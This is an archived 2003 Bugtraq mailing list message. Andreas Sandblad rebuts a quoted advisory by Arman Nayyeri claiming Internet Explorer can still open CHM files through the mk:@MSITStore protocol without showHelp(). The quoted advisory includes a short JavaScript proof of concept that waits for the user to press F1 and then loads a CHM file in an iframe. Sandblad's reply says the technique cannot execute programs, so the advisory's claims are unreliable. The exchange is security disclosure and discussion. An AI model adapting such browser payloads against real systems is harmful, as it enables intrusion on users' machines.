lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Thu, 4 Sep 2003 09:27:50 +0200 (CEST)
From: Andreas Sandblad <sandblad@....umu.se>
To: Arman Nayyeri <arman-n@...eaker.net>
Cc: bugtraq@...urityfocus.com
Subject: Re: IE: CHM Attacks are still alive (CHM attack without showHelp())


In order to use the shortcut command your code must be launched
in HTML Help. Simply linking to contents inside a chm file with the
mk: protocol will not do the trick since you are still operating inside
IE. That is the reason why you didn't get the chm file to execute
programs using the shortcut command.

I believe MS successfully secured showHelp(...) to stop various attacks
using the shortcut command (including Sandblad #10).

/Andreas Sandblad

On Tue, 2 Sep 2003, Arman Nayyeri wrote:

>
>
>                               !! R/\/\an#0001 !!
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> CHM Attacks are still alive
> ===========================
> Title:    CHM Attacks are still alive
> Date:     Tuesday, September 02, 2003
> Software: IE (What a nice program!!!)
> Vendor:   Microsoft Corp. (I love Microsoft)
> Patch:    N/A
> Author:   Arman Nayyeri, arman-n@...eaker.net
>
>
> Vendor Status:
> ==============
> Microsoft was not contacted, because I don't know email address of
> Microsoft.
>
>
> Description:
> ============
>
> After releasing MS03-004 patch, it is still possible to execute a chm file
> without using of showHelp() command.
> We can use mk:@MSITStore to execute CHM files, but with some tricks.
>
> 1.first we must have an help window opened in order to chm file to work
> correctly.
>
> 2.We must open a window (or an iframe) that points to
> mk:@MSITStore:pathof.chm::/compiledhtmlfilewithinchm.html
>
> The first one is hard but easy with the help of the user.
> We can say to user to press F1 key then by using a onkeydown event go to
> step 2.
> As easy as this!!!!!
> The microsoft patch just stop showHelp() functionality but it is still
> possible.
> If you use a url for chm file ,it will open and show the content of file
> but do not execute programs without generating any errors. (I test it on
> one chm file ,you can try more, maybe its worked!)
> But in the case of sandblad #11 ,I can't produce it without showHelp(),
> and I need the help of Andreas.
> Andreas!, I believe that it will work, so try it!!.
>
> Exploit
> =======
> As you can see, here is the simple javascript code that I write to exploit
> this.
> you must:
> 1.make a chm file and save it as c:\msit.chm (download free tool for
> making a chm file from http://go.microsoft.com/fwlink/?LinkId=14188 )
> 2.remove all ! from script
> 3.create a html file and copy the code into that
> 4.open the html page and press F1 key (at the top left corner of your
> keyboard)
> (you may need to increase Timeout to allow the IE help to be opened)
>
> -------------------------------BEGINING OF FILE---------------------------
> <!h2>You should press "F1" key (at the top left corner of your keyboard)
> </h2>
> <!script>
> function gotKey(){
> if (event.keyCode==112){
>     setTimeout(
>         function () {
> 	   document.write('<iframe id=I1
> src="mk:@MSITStore:c:\\msit.chm::/page.html"></'+'iframe><br><h3>I Love
> IRAN<br>R/\/\an#0001</h3>');
>         },
>         1194
>     );
> }
> }
> document.onkeydown = gotKey;
> <!/script>
> ---------------------------------END OF FILE------------------------------
>
>
> Disclaimer:
> ===========
> Arman Nayyeri is not responsible for the misuse of the information
> provided in this advisory. The opinions expressed are my own and not of
> any company. In no event shall the author be liable for any damages
> whatsoever arising out of or in connection with the use or spread of this
> advisory. Any use of the information is at the user's own risk.
>
>
> Please Contact Me:
> ==================
> arman-n@...eaker.net
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Arman Nayyeri
> 	MCP, MCSE 2000(in next two weeks)
>
> Semnan, IRAN (IRAN IS MY COUNTRY, I LOVE IRAN!!!)
>

-- 
    _     _
  o' \,=./ `o
     (o o)
-ooO--(_)--Ooo-

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ